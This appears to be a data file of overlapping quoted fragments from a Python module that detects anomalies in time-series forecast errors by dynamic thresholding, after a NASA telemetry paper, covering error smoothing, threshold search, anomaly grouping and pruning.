"The treshold is determined dynamically by testing multiple Zs. # z is drawn",
"smoothed_errors_max[i] if perc_change < MIN_PERCENT_DECREASE: indices_remove.append(e_seq_max.index(smoothed_errors_max[i])) for index in sorted(indices_remove, reverse=True): del e_seq[index]",
"cutoff value for anomalies until model is trained enough anomaly_indices = [] max_error_below_e",
"if len(errors_seq) > 0: anomaly_indices = prune_anomalies( errors_seq, smoothed_errors, max_error_below_e, anomaly_indices ) return",
"epsilon, sd_threshold = compute_threshold(window_smoothed_errors, error_buffer) window_anom_indices = get_anomalies( window_smoothed_errors, window_y_true, sd_threshold, i, anomalies_indices,",
"right_window = len(errors) moving_avg.append(np.mean(errors[left_window:right_window])) return moving_avg def extract_anomalies(y_true, smoothed_errors, window_size, batch_size, error_buffer): \"\"\"",
"batch_size=30, smoothing_percent=0.05, smoothed=True): \"\"\" Calculates the forecasting error for two arrays of data.",
"smoothed: return errors historical_error_window = int(window_size * batch_size * smoothing_percent) moving_avg = []",
"moving_avg def extract_anomalies(y_true, smoothed_errors, window_size, batch_size, error_buffer): \"\"\" Extracts anomalies from the errors.",
"len(y_true))) num_windows = int((len(y_true) - (batch_size * window_size)) / batch_size) anomalies_indices = []",
"+ 1 if left_window < 0: left_window = 0 if right_window > len(errors):",
"error_buffer (int): Returns: \"\"\" if len(y_true) <= batch_size * window_size: raise ValueError(\"Window size",
"0.05 * accepted_range: # not an anomaly continue for j in range(error_buffer): if",
"len(y_true) <= batch_size * window_size: raise ValueError(\"Window size (%s) larger than y_true (len=%s).\"",
"i + historical_error_window + 1 if left_window < 0: left_window = 0 if",
"anomalies into continuous sequences anomaly_indices = sorted(list(set(anomaly_indices))) groups = [list(group) for group in",
"timeseries data # Implementation inspired by: https://arxiv.org/pdf/1802.04431.pdf def get_forecast_errors(y_hat, y_true, window_size=5, batch_size=30, smoothing_percent=0.05,",
"= (mu - np.mean(below_epsilon)) / mu sd_perc_decrease = (sigma - np.std(below_epsilon)) / sigma",
"seen so far if epsilon > max_epsilon: sd_threshold = z max_epsilon = epsilon",
"left_window = 0 if right_window > len(errors): right_window = len(errors) moving_avg.append(np.mean(errors[left_window:right_window])) return moving_avg",
"so far if epsilon > max_epsilon: sd_threshold = z max_epsilon = epsilon #",
"anomaly_indices def group_consecutive_anomalies(smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies, batch_size=30): upper_percentile, lower_percentile = np.percentile(y_true,",
"sigma = np.std(smoothed_errors) max_epsilon = 0 sd_threshold = sd_limit # The treshold is",
"- smoothed_errors_max[i + 1] perc_change = delta / smoothed_errors_max[i] if perc_change < MIN_PERCENT_DECREASE:",
"smoothed_errors[prev_index:curr_index] window_y_true = y_true[prev_index:curr_index] epsilon, sd_threshold = compute_threshold(window_smoothed_errors, error_buffer) window_anom_indices = get_anomalies( window_smoothed_errors,",
"below epsilon and which # weren't identified as anomalies to process them for",
"process them for i in range(len(smoothed_errors)): adjusted_index = i + (window - 1)",
"y_true, error_buffer, window, all_anomalies, batch_size=30): upper_percentile, lower_percentile = np.percentile(y_true, [95, 5]) accepted_range =",
"< epsilon: # save to compute delta mean and delta std # these",
"smoothed_errors_max.sort(reverse=True) if max_error_below_e > 0: smoothed_errors_max.append(max_error_below_e) indices_remove = [] for i in range(len(smoothed_errors_max)):",
"= get_anomalies( smoothed_errors_inv, window_y_true, sd_inv, i, anomalies_indices, len(y_true) ) anomalies_indices = list(set(anomalies_indices +",
"in anomalies_groups if not g[0] == g[-1]] # generate \"scores\" for anomalies based",
"the errors that are below epsilon and which # weren't identified as anomalies",
"in range(num_windows + 1): prev_index = i * batch_size curr_index = (window_size *",
"= epsilon # sd_threshold can be multiplied by sigma to get epsilon return",
"in above_epsilon and (i - j) >= 0: above_epsilon.append(i - j) if len(above_epsilon)",
"[list(group) for group in mit.consecutive_groups(anomalies_indices)] anomaly_sequences = [(g[0], g[-1]) for g in anomalies_groups",
"- j) not in anomaly_indices: if (i - j) > minimum_index: anomaly_indices.append(i -",
"= i + (window - 1) * batch_size if smoothed_errors[i] > max_error_below_e and",
"anomalous sequences MIN_PERCENT_DECREASE = 0.05 e_seq_max, smoothed_errors_max = [], [] for error_seq in",
"batch_size * window_size: raise ValueError(\"Window size (%s) larger than y_true (len=%s).\" % (batch_size,",
"get_anomalies( window_smoothed_errors, window_y_true, sd_threshold, i, anomalies_indices, error_buffer ) # get anomalies from inverse",
"group anomalies into continuous sequences anomaly_indices = sorted(list(set(anomaly_indices))) groups = [list(group) for group",
"> len(errors): right_window = len(errors) moving_avg.append(np.mean(errors[left_window:right_window])) return moving_avg def extract_anomalies(y_true, smoothed_errors, window_size, batch_size,",
"values are anomalies for j in range(0, error_buffer): if (i + j) not",
"np.mean(below_epsilon)) / mu sd_perc_decrease = (sigma - np.std(below_epsilon)) / sigma epsilon = (mean_perc_decrease",
"of NASA paper but # wasn't referenced in the paper # we get",
"batch_size if smoothed_errors[i] > max_error_below_e and adjusted_index not in all_anomalies: if i not",
"the largest epsilon we've seen so far if epsilon > max_epsilon: sd_threshold =",
"len(y_true) window_smoothed_errors = smoothed_errors[prev_index:curr_index] window_y_true = y_true[prev_index:curr_index] epsilon, sd_threshold = compute_threshold(window_smoothed_errors, error_buffer) window_anom_indices",
"e_seq_max.append(max(sliced_errors)) smoothed_errors_max.append(max(sliced_errors)) smoothed_errors_max.sort(reverse=True) if max_error_below_e > 0: smoothed_errors_max.append(max_error_below_e) indices_remove = [] for i",
"and (i + j) not in anomaly_indices: if (i + j) > minimum_index:",
"accepted_range: # not an anomaly continue for j in range(error_buffer): if (i +",
"groups = [list(group) for group in mit.consecutive_groups(anomaly_indices)] e_seq = [(g[0], g[-1]) for g",
"EWMA. Returns: (list): error residuals. Smoothed if specified by user. \"\"\" errors =",
"= [] max_error_below_e = 0 for i in range(len(smoothed_errors)): if smoothed_errors[i] <= epsilon",
"[(g[0], g[-1]) for g in groups if g[0] != g[-1]] return e_seq, anomaly_indices,",
"\"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) epsilon = mu + (z *",
"compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0): \"\"\"Helper method for `extract_anomalies` method. Calculates the epsilon (threshold) for",
"- j) >= 0: above_epsilon.append(i - j) if len(above_epsilon) == 0: continue #",
"anomalies_scores.append(score) return anomaly_sequences, anomalies_scores def compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0): \"\"\"Helper method for `extract_anomalies` method.",
"compute_threshold(window_smoothed_errors, error_buffer) window_anom_indices = get_anomalies( window_smoothed_errors, window_y_true, sd_threshold, i, anomalies_indices, error_buffer ) #",
"max_epsilon, sd_threshold def get_anomalies(smoothed_errors, y_true, z, window, all_anomalies, error_buffer): \"\"\" Helper method to",
"are important for epsilon calculation below_epsilon.append(e) below_indices.append(i) if e > epsilon: # above_epsilon",
"range(num_windows + 1): prev_index = i * batch_size curr_index = (window_size * batch_size)",
"returned errors should be smoothed with EWMA. Returns: (list): error residuals. Smoothed if",
"i not in anomaly_indices: max_error_below_e = smoothed_errors[i] # group anomalies into continuous sequences",
"- 1) * batch_size if smoothed_errors[i] > max_error_below_e and adjusted_index not in all_anomalies:",
"= smoothed_errors[i] if e < epsilon: # save to compute delta mean and",
"e_seq = [(g[0], g[-1]) for g in groups if g[0] != g[-1]] return",
"# save to compute delta mean and delta std # these are important",
"epsilon and which # weren't identified as anomalies to process them for i",
"= [] for i in range(num_windows + 1): prev_index = i * batch_size",
"in np.arange(2.5, sd_limit, 0.5): epsilon = mu + (sigma * z) below_epsilon, below_indices,",
"= np.mean(smoothed_errors) sigma = np.std(smoothed_errors) epsilon = mu + (z * sigma) #",
"[] for error_seq in e_seq: if len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0: sliced_errors = smoothed_errors[error_seq[0]:error_seq[1]] e_seq_max.append(max(sliced_errors))",
"smoothed errors # This was done in the implementation of NASA paper but",
"the max distance from epsilon for each sequence anomalies_scores = [] for e_seq",
"in anomaly_indices: if (i - j) > minimum_index: anomaly_indices.append(i - j) # get",
"= [(g[0], g[-1]) for g in anomalies_groups if not g[0] == g[-1]] #",
"epsilon calculation below_epsilon.append(e) below_indices.append(i) if e > epsilon: # above_epsilon values are anomalies",
"abs(smoothed_errors[x] - epsilon) / denominator for x in range(e_seq[0], e_seq[1]) ]) anomalies_scores.append(score) return",
"for error_seq in e_seq: if i >= error_seq[0] and i <= error_seq[1]: pruned_indices.append(i)",
"compute_threshold(smoothed_errors_inv, error_buffer) inv_anom_indices = get_anomalies( smoothed_errors_inv, window_y_true, sd_inv, i, anomalies_indices, len(y_true) ) anomalies_indices",
"smoothing_percent) moving_avg = [] for i in range(len(errors)): left_window = i - historical_error_window",
"residuals. Smoothed if specified by user. \"\"\" errors = [abs(y_h - y_t) for",
"zip(y_hat, y_true)] if not smoothed: return errors historical_error_window = int(window_size * batch_size *",
"[(g[0], g[-1]) for g in anomalies_groups if not g[0] == g[-1]] # generate",
"np.mean(smoothed_errors) sigma = np.std(smoothed_errors) max_epsilon = 0 sd_threshold = sd_limit # The treshold",
"save to compute delta mean and delta std # these are important for",
"= (window_size * batch_size) + (i * batch_size) if i == num_windows +",
"epsilon # sd_threshold can be multiplied by sigma to get epsilon return max_epsilon,",
"% (batch_size, len(y_true))) num_windows = int((len(y_true) - (batch_size * window_size)) / batch_size) anomalies_indices",
"(i + j) < len(smoothed_errors): above_epsilon.append(i + j) if (i - j) not",
"errors should be smoothed with EWMA. Returns: (list): error residuals. Smoothed if specified",
"= np.std(smoothed_errors) epsilon = mu + (z * sigma) # compare to epsilon",
"anomaly_indices: if (i + j) > minimum_index: anomaly_indices.append(i + j) if (i -",
"for g in groups if not g[0] == g[-1]] mean_perc_decrease = (mu -",
"[] max_error_below_e = 0 for i in range(len(smoothed_errors)): if smoothed_errors[i] <= epsilon or",
"j) not in anomaly_indices: if (i - j) > minimum_index: anomaly_indices.append(i - j)",
"\"\"\" Calculates the forecasting error for two arrays of data. If smoothed errors",
"important for epsilon calculation below_epsilon.append(e) below_indices.append(i) if e > epsilon: # above_epsilon values",
"arrays of data. If smoothed errors desired, runs EWMA. Args: y_hat (list): forecasted",
"mit import numpy as np # Methods to do dynamic error thresholding on",
"sd_threshold = compute_threshold(window_smoothed_errors, error_buffer) window_anom_indices = get_anomalies( window_smoothed_errors, window_y_true, sd_threshold, i, anomalies_indices, error_buffer",
"each sequence anomalies_scores = [] for e_seq in anomaly_sequences: denominator = np.mean(smoothed_errors) +",
"0 for i in range(len(smoothed_errors)): if smoothed_errors[i] <= epsilon or smoothed_errors[i] <= 0.05",
"(i - j) not in anomaly_indices: if (i - j) > minimum_index: anomaly_indices.append(i",
"y_true (list): true values. len(y_hat)==len(y_true). window_size (int): batch_size (int): smoothing_percent (float): smoothed (bool):",
"extract_anomalies(y_true, smoothed_errors, window_size, batch_size, error_buffer): \"\"\" Extracts anomalies from the errors. Args: y_true",
"sigma) # compare to epsilon errors_seq, anomaly_indices, max_error_below_e = group_consecutive_anomalies( smoothed_errors, epsilon, y_true,",
"def group_consecutive_anomalies(smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies, batch_size=30): upper_percentile, lower_percentile = np.percentile(y_true, [95,",
"if smoothed_errors[i] > max_error_below_e and adjusted_index not in all_anomalies: if i not in",
"data. If smoothed errors desired, runs EWMA. Args: y_hat (list): forecasted values. len(y_hat)==len(y_true).",
"= 100 # have a cutoff value for anomalies until model is trained",
"window_size)) / batch_size) anomalies_indices = [] for i in range(num_windows + 1): prev_index",
"(%s) larger than y_true (len=%s).\" % (batch_size, len(y_true))) num_windows = int((len(y_true) - (batch_size",
"anomaly_indices: max_error_below_e = smoothed_errors[i] # group anomalies into continuous sequences anomaly_indices = sorted(list(set(anomaly_indices)))",
"max_error_below_e, anomaly_indices): \"\"\" Helper method that removes anomalies which don't meet a minimum",
"if e < epsilon: # save to compute delta mean and delta std",
"np.std(below_epsilon)) / sigma epsilon = (mean_perc_decrease + sd_perc_decrease) /\\ (len(above_sequences)**2 + len(above_epsilon)) #",
"return e_seq, anomaly_indices, max_error_below_e def prune_anomalies(e_seq, smoothed_errors, max_error_below_e, anomaly_indices): \"\"\" Helper method that",
"pruned_indices = [] for i in anomaly_indices: for error_seq in e_seq: if i",
"removes anomalies which don't meet a minimum separation from next anomaly. \"\"\" #",
"- (batch_size * window_size)) / batch_size) anomalies_indices = [] for i in range(num_windows",
"batch_size) anomalies_indices = [] for i in range(num_windows + 1): prev_index = i",
"minimum_index: anomaly_indices.append(i + j) if (i - j) < len(smoothed_errors) and (i -",
"for i in anomaly_indices: for error_seq in e_seq: if i >= error_seq[0] and",
"from the errors. Args: y_true (): smoothed_errors (): window_size (int): batch_size (int): error_buffer",
"len(smoothed_errors_max) - 1: delta = smoothed_errors_max[i] - smoothed_errors_max[i + 1] perc_change = delta",
"np.percentile(y_true, [95, 5]) accepted_range = upper_percentile - lower_percentile minimum_index = 100 # have",
"0: above_epsilon.append(i - j) if len(above_epsilon) == 0: continue # generate sequences above_epsilon",
"decrease btwn max errors in anomalous sequences MIN_PERCENT_DECREASE = 0.05 e_seq_max, smoothed_errors_max =",
"until model is trained enough anomaly_indices = [] max_error_below_e = 0 for i",
"* batch_size) if i == num_windows + 1: curr_index = len(y_true) window_smoothed_errors =",
"e) for e in window_smoothed_errors] epsilon_inv, sd_inv = compute_threshold(smoothed_errors_inv, error_buffer) inv_anom_indices = get_anomalies(",
"Implementation inspired by: https://arxiv.org/pdf/1802.04431.pdf def get_forecast_errors(y_hat, y_true, window_size=5, batch_size=30, smoothing_percent=0.05, smoothed=True): \"\"\" Calculates",
"= int((len(y_true) - (batch_size * window_size)) / batch_size) anomalies_indices = [] for i",
"smoothed_errors, window_size, batch_size, error_buffer): \"\"\" Extracts anomalies from the errors. Args: y_true ():",
"= sorted(list(set(anomalies_indices))) anomalies_groups = [list(group) for group in mit.consecutive_groups(anomalies_indices)] anomaly_sequences = [(g[0], g[-1])",
"the forecasting error for two arrays of data. If smoothed errors desired, runs",
"sigma = np.std(smoothed_errors) epsilon = mu + (z * sigma) # compare to",
"anomaly continue for j in range(error_buffer): if (i + j) < len(smoothed_errors) and",
"anomaly_indices.append(i + j) if (i - j) < len(smoothed_errors) and (i - j)",
"these are important for epsilon calculation below_epsilon.append(e) below_indices.append(i) if e > epsilon: #",
"< len(smoothed_errors): above_epsilon.append(i + j) if (i - j) not in above_epsilon and",
"[], [] for error_seq in e_seq: if len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0: sliced_errors = smoothed_errors[error_seq[0]:error_seq[1]]",
"> minimum_index: anomaly_indices.append(i - j) # get all the errors that are below",
"for i in range(len(smoothed_errors)): e = smoothed_errors[i] if e < epsilon: # save",
"in mit.consecutive_groups(anomaly_indices)] e_seq = [(g[0], g[-1]) for g in groups if g[0] !=",
"curr_index = (window_size * batch_size) + (i * batch_size) if i == num_windows",
"errors desired, runs EWMA. Args: y_hat (list): forecasted values. len(y_hat)==len(y_true). y_true (list): true",
"anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) epsilon = mu + (z",
"two arrays of data. If smoothed errors desired, runs EWMA. Args: y_hat (list):",
"values. len(y_hat)==len(y_true). y_true (list): true values. len(y_hat)==len(y_true). window_size (int): batch_size (int): smoothing_percent (float):",
"+ j) not in above_epsilon and (i + j) < len(smoothed_errors): above_epsilon.append(i +",
"== g[-1]] # generate \"scores\" for anomalies based on the max distance from",
"(bool): whether the returned errors should be smoothed with EWMA. Returns: (list): error",
"sliced_errors = smoothed_errors[error_seq[0]:error_seq[1]] e_seq_max.append(max(sliced_errors)) smoothed_errors_max.append(max(sliced_errors)) smoothed_errors_max.sort(reverse=True) if max_error_below_e > 0: smoothed_errors_max.append(max_error_below_e) indices_remove =",
"np.std(smoothed_errors) score = max([ abs(smoothed_errors[x] - epsilon) / denominator for x in range(e_seq[0],",
"e > epsilon: # above_epsilon values are anomalies for j in range(0, error_buffer):",
"- historical_error_window right_window = i + historical_error_window + 1 if left_window < 0:",
"based on the max distance from epsilon for each sequence anomalies_scores = []",
"sigma to get epsilon return max_epsilon, sd_threshold def get_anomalies(smoothed_errors, y_true, z, window, all_anomalies,",
"moving_avg.append(np.mean(errors[left_window:right_window])) return moving_avg def extract_anomalies(y_true, smoothed_errors, window_size, batch_size, error_buffer): \"\"\" Extracts anomalies from",
"- epsilon) / denominator for x in range(e_seq[0], e_seq[1]) ]) anomalies_scores.append(score) return anomaly_sequences,",
"z) below_epsilon, below_indices, above_epsilon = [], [], [] for i in range(len(smoothed_errors)): e",
"smoothed_errors, max_error_below_e, anomaly_indices ) return anomaly_indices def group_consecutive_anomalies(smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies,",
"/\\ (len(above_sequences)**2 + len(above_epsilon)) # update the largest epsilon we've seen so far",
"len(errors) moving_avg.append(np.mean(errors[left_window:right_window])) return moving_avg def extract_anomalies(y_true, smoothed_errors, window_size, batch_size, error_buffer): \"\"\" Extracts anomalies",
"delta mean and delta std # these are important for epsilon calculation below_epsilon.append(e)",
"smoothed_errors[i] > max_error_below_e and adjusted_index not in all_anomalies: if i not in anomaly_indices:",
"dynamically by testing multiple Zs. # z is drawn from an ordered set",
"= len(y_true) window_smoothed_errors = smoothed_errors[prev_index:curr_index] window_y_true = y_true[prev_index:curr_index] epsilon, sd_threshold = compute_threshold(window_smoothed_errors, error_buffer)",
"g[-1]) for g in groups if not g[0] == g[-1]] mean_perc_decrease = (mu",
"mean and delta std # these are important for epsilon calculation below_epsilon.append(e) below_indices.append(i)",
"= smoothed_errors_max[i] - smoothed_errors_max[i + 1] perc_change = delta / smoothed_errors_max[i] if perc_change",
"method that removes anomalies which don't meet a minimum separation from next anomaly.",
"for group in mit.consecutive_groups(anomalies_indices)] anomaly_sequences = [(g[0], g[-1]) for g in anomalies_groups if",
"# generate \"scores\" for anomalies based on the max distance from epsilon for",
"for `extract_anomalies` method. Calculates the epsilon (threshold) for anomalies. \"\"\" mu = np.mean(smoothed_errors)",
"delta / smoothed_errors_max[i] if perc_change < MIN_PERCENT_DECREASE: indices_remove.append(e_seq_max.index(smoothed_errors_max[i])) for index in sorted(indices_remove, reverse=True):",
"paper but # wasn't referenced in the paper # we get the inverse",
"+ inv_anom_indices)) anomalies_indices.extend([i_a + i * batch_size for i_a in window_anom_indices]) # group",
"max_error_below_e, anomaly_indices ) return anomaly_indices def group_consecutive_anomalies(smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies, batch_size=30):",
"[] for e_seq in anomaly_sequences: denominator = np.mean(smoothed_errors) + np.std(smoothed_errors) score = max([",
"# update the largest epsilon we've seen so far if epsilon > max_epsilon:",
"continue for j in range(error_buffer): if (i + j) < len(smoothed_errors) and (i",
"groups if g[0] != g[-1]] return e_seq, anomaly_indices, max_error_below_e def prune_anomalies(e_seq, smoothed_errors, max_error_below_e,",
"separation from next anomaly. \"\"\" # min accepted perc decrease btwn max errors",
"minimum separation from next anomaly. \"\"\" # min accepted perc decrease btwn max",
"than y_true (len=%s).\" % (batch_size, len(y_true))) num_windows = int((len(y_true) - (batch_size * window_size))",
"# get anomalies from inverse of smoothed errors # This was done in",
"the # number of standard deviations above mean(smoothed_errors) # here we iterate in",
"\"\"\" Helper method to get anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors)",
"(): smoothed_errors (): window_size (int): batch_size (int): error_buffer (int): Returns: \"\"\" if len(y_true)",
"range(len(smoothed_errors)): adjusted_index = i + (window - 1) * batch_size if smoothed_errors[i] >",
"/ smoothed_errors_max[i] if perc_change < MIN_PERCENT_DECREASE: indices_remove.append(e_seq_max.index(smoothed_errors_max[i])) for index in sorted(indices_remove, reverse=True): del",
"len(y_hat)==len(y_true). window_size (int): batch_size (int): smoothing_percent (float): smoothed (bool): whether the returned errors",
"the inverse by flipping around the mean mu = np.mean(window_smoothed_errors) smoothed_errors_inv = [mu",
"+ (sigma * z) below_epsilon, below_indices, above_epsilon = [], [], [] for i",
"epsilon, y_true, error_buffer, window, all_anomalies, batch_size=30): upper_percentile, lower_percentile = np.percentile(y_true, [95, 5]) accepted_range",
"inv_anom_indices = get_anomalies( smoothed_errors_inv, window_y_true, sd_inv, i, anomalies_indices, len(y_true) ) anomalies_indices = list(set(anomalies_indices",
"indices_remove = [] for i in range(len(smoothed_errors_max)): if i < len(smoothed_errors_max) - 1:",
"+ 1] perc_change = delta / smoothed_errors_max[i] if perc_change < MIN_PERCENT_DECREASE: indices_remove.append(e_seq_max.index(smoothed_errors_max[i])) for",
"values. len(y_hat)==len(y_true). window_size (int): batch_size (int): smoothing_percent (float): smoothed (bool): whether the returned",
"group anomalies anomalies_indices = sorted(list(set(anomalies_indices))) anomalies_groups = [list(group) for group in mit.consecutive_groups(anomalies_indices)] anomaly_sequences",
"Methods to do dynamic error thresholding on timeseries data # Implementation inspired by:",
"Calculates the forecasting error for two arrays of data. If smoothed errors desired,",
"5]) accepted_range = upper_percentile - lower_percentile minimum_index = 100 # have a cutoff",
"np # Methods to do dynamic error thresholding on timeseries data # Implementation",
"0.5): epsilon = mu + (sigma * z) below_epsilon, below_indices, above_epsilon = [],",
"Helper method to get anomalies. \"\"\" mu = np.mean(smoothed_errors) sigma = np.std(smoothed_errors) epsilon",
"which # weren't identified as anomalies to process them for i in range(len(smoothed_errors)):",
"* window_size: raise ValueError(\"Window size (%s) larger than y_true (len=%s).\" % (batch_size, len(y_true)))",
"# above_epsilon values are anomalies for j in range(0, error_buffer): if (i +",
"g[0] != g[-1]] return e_seq, anomaly_indices, max_error_below_e def prune_anomalies(e_seq, smoothed_errors, max_error_below_e, anomaly_indices): \"\"\"",
"batch_size) if i == num_windows + 1: curr_index = len(y_true) window_smoothed_errors = smoothed_errors[prev_index:curr_index]",
"window_y_true, sd_threshold, i, anomalies_indices, error_buffer ) # get anomalies from inverse of smoothed",
"is determined dynamically by testing multiple Zs. # z is drawn from an",
"for error_seq in e_seq: if len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0: sliced_errors = smoothed_errors[error_seq[0]:error_seq[1]] e_seq_max.append(max(sliced_errors)) smoothed_errors_max.append(max(sliced_errors))",
"the errors. Args: y_true (): smoothed_errors (): window_size (int): batch_size (int): error_buffer (int):",
"in e_seq: if i >= error_seq[0] and i <= error_seq[1]: pruned_indices.append(i) return pruned_indices",
"- lower_percentile minimum_index = 100 # have a cutoff value for anomalies until",
"= [abs(y_h - y_t) for y_h, y_t in zip(y_hat, y_true)] if not smoothed:",
"in e_seq: if len(smoothed_errors[error_seq[0]:error_seq[1]]) > 0: sliced_errors = smoothed_errors[error_seq[0]:error_seq[1]] e_seq_max.append(max(sliced_errors)) smoothed_errors_max.append(max(sliced_errors)) smoothed_errors_max.sort(reverse=True) if",
"and (i - j) >= 0: above_epsilon.append(i - j) if len(above_epsilon) == 0:",
"error for two arrays of data. If smoothed errors desired, runs EWMA. Args:",
"= int(window_size * batch_size * smoothing_percent) moving_avg = [] for i in range(len(errors)):",
"to do dynamic error thresholding on timeseries data # Implementation inspired by: https://arxiv.org/pdf/1802.04431.pdf",
"groups if not g[0] == g[-1]] mean_perc_decrease = (mu - np.mean(below_epsilon)) / mu",
"desired, runs EWMA. Args: y_hat (list): forecasted values. len(y_hat)==len(y_true). y_true (list): true values.",
"set of positive values representing the # number of standard deviations above mean(smoothed_errors)",
"sorted(list(set(anomaly_indices))) groups = [list(group) for group in mit.consecutive_groups(anomaly_indices)] e_seq = [(g[0], g[-1]) for",
"in range(len(smoothed_errors)): adjusted_index = i + (window - 1) * batch_size if smoothed_errors[i]",
"or smoothed_errors[i] <= 0.05 * accepted_range: # not an anomaly continue for j",
"larger than y_true (len=%s).\" % (batch_size, len(y_true))) num_windows = int((len(y_true) - (batch_size *",
"paper found to be good for z in np.arange(2.5, sd_limit, 0.5): epsilon =",
"from next anomaly. \"\"\" # min accepted perc decrease btwn max errors in",
">= 0: above_epsilon.append(i - j) if len(above_epsilon) == 0: continue # generate sequences",
"on the max distance from epsilon for each sequence anomalies_scores = [] for",
"and adjusted_index not in all_anomalies: if i not in anomaly_indices: max_error_below_e = smoothed_errors[i]",
"range(len(smoothed_errors_max)): if i < len(smoothed_errors_max) - 1: delta = smoothed_errors_max[i] - smoothed_errors_max[i +",
"deviations above mean(smoothed_errors) # here we iterate in increments of 0.5 on the",
"sd_limit=12.0): \"\"\"Helper method for `extract_anomalies` method. Calculates the epsilon (threshold) for anomalies. \"\"\"",
"if (i + j) > minimum_index: anomaly_indices.append(i + j) if (i - j)",
"on the range that the NASA paper found to be good for z",
"i in range(len(smoothed_errors)): adjusted_index = i + (window - 1) * batch_size if",
"group_consecutive_anomalies( smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies ) if len(errors_seq) > 0: anomaly_indices",
"not g[0] == g[-1]] # generate \"scores\" for anomalies based on the max",
"# group anomalies anomalies_indices = sorted(list(set(anomalies_indices))) anomalies_groups = [list(group) for group in mit.consecutive_groups(anomalies_indices)]",
"y_true (): smoothed_errors (): window_size (int): batch_size (int): error_buffer (int): Returns: \"\"\" if",
"+ j) < len(smoothed_errors) and (i + j) not in anomaly_indices: if (i",
"]) anomalies_scores.append(score) return anomaly_sequences, anomalies_scores def compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0): \"\"\"Helper method for `extract_anomalies`",
"which don't meet a minimum separation from next anomaly. \"\"\" # min accepted",
"whether the returned errors should be smoothed with EWMA. Returns: (list): error residuals.",
"return errors historical_error_window = int(window_size * batch_size * smoothing_percent) moving_avg = [] for",
"drawn from an ordered set of positive values representing the # number of",
"= mu + (sigma * z) below_epsilon, below_indices, above_epsilon = [], [], []",
"= group_consecutive_anomalies( smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies ) if len(errors_seq) > 0:",
"+ (z * sigma) # compare to epsilon errors_seq, anomaly_indices, max_error_below_e = group_consecutive_anomalies(",
"upper_percentile, lower_percentile = np.percentile(y_true, [95, 5]) accepted_range = upper_percentile - lower_percentile minimum_index =",
"i + (window - 1) * batch_size if smoothed_errors[i] > max_error_below_e and adjusted_index",
"not in all_anomalies: if i not in anomaly_indices: max_error_below_e = smoothed_errors[i] # group",
"max_error_below_e > 0: smoothed_errors_max.append(max_error_below_e) indices_remove = [] for i in range(len(smoothed_errors_max)): if i",
"compute delta mean and delta std # these are important for epsilon calculation",
"* sigma) # compare to epsilon errors_seq, anomaly_indices, max_error_below_e = group_consecutive_anomalies( smoothed_errors, epsilon,",
"smoothed_errors[i] <= 0.05 * accepted_range: # not an anomaly continue for j in",
"= 0.05 e_seq_max, smoothed_errors_max = [], [] for error_seq in e_seq: if len(smoothed_errors[error_seq[0]:error_seq[1]])",
"that removes anomalies which don't meet a minimum separation from next anomaly. \"\"\"",
"smoothed_errors (): window_size (int): batch_size (int): error_buffer (int): Returns: \"\"\" if len(y_true) <=",
"paper # we get the inverse by flipping around the mean mu =",
"below_epsilon.append(e) below_indices.append(i) if e > epsilon: # above_epsilon values are anomalies for j",
"if len(above_epsilon) == 0: continue # generate sequences above_epsilon = sorted(list(set(above_epsilon))) groups =",
"(i + j) not in anomaly_indices: if (i + j) > minimum_index: anomaly_indices.append(i",
"anomaly_indices ) return anomaly_indices def group_consecutive_anomalies(smoothed_errors, epsilon, y_true, error_buffer, window, all_anomalies, batch_size=30): upper_percentile,",
"y_h, y_t in zip(y_hat, y_true)] if not smoothed: return errors historical_error_window = int(window_size",
"perc decrease btwn max errors in anomalous sequences MIN_PERCENT_DECREASE = 0.05 e_seq_max, smoothed_errors_max",
"is trained enough anomaly_indices = [] max_error_below_e = 0 for i in range(len(smoothed_errors)):",
"the mean mu = np.mean(window_smoothed_errors) smoothed_errors_inv = [mu + (mu - e) for",
"enough anomaly_indices = [] max_error_below_e = 0 for i in range(len(smoothed_errors)): if smoothed_errors[i]",
"x in range(e_seq[0], e_seq[1]) ]) anomalies_scores.append(score) return anomaly_sequences, anomalies_scores def compute_threshold(smoothed_errors, error_buffer, sd_limit=12.0):",
"get_anomalies(smoothed_errors, y_true, z, window, all_anomalies, error_buffer): \"\"\" Helper method to get anomalies. \"\"\"",
"next anomaly. \"\"\" # min accepted perc decrease btwn max errors in anomalous",
"in groups if not g[0] == g[-1]] mean_perc_decrease = (mu - np.mean(below_epsilon)) /",
"anomalies which don't meet a minimum separation from next anomaly. \"\"\" # min",
"epsilon: # save to compute delta mean and delta std # these are",
"max([ abs(smoothed_errors[x] - epsilon) / denominator for x in range(e_seq[0], e_seq[1]) ]) anomalies_scores.append(score)",
"in above_epsilon and (i + j) < len(smoothed_errors): above_epsilon.append(i + j) if (i",
"historical_error_window right_window = i + historical_error_window + 1 if left_window < 0: left_window",
"and delta std # these are important for epsilon calculation below_epsilon.append(e) below_indices.append(i) if",
"error_buffer, window, all_anomalies, batch_size=30): upper_percentile, lower_percentile = np.percentile(y_true, [95, 5]) accepted_range = upper_percentile",
"mit.consecutive_groups(anomalies_indices)] anomaly_sequences = [(g[0], g[-1]) for g in anomalies_groups if not g[0] ==",
"1: delta = smoothed_errors_max[i] - smoothed_errors_max[i + 1] perc_change = delta / smoothed_errors_max[i]",
"= compute_threshold(window_smoothed_errors, error_buffer) window_anom_indices = get_anomalies( window_smoothed_errors, window_y_true, sd_threshold, i, anomalies_indices, error_buffer )",
"historical_error_window + 1 if left_window < 0: left_window = 0 if right_window >",
"max_error_below_e = 0 for i in range(len(smoothed_errors)): if smoothed_errors[i] <= epsilon or smoothed_errors[i]",
"for i in range(len(smoothed_errors)): if smoothed_errors[i] <= epsilon or smoothed_errors[i] <= 0.05 *",
"wasn't referenced in the paper # we get the inverse by flipping around",
"(i - j) >= 0: above_epsilon.append(i - j) if len(above_epsilon) == 0: continue",
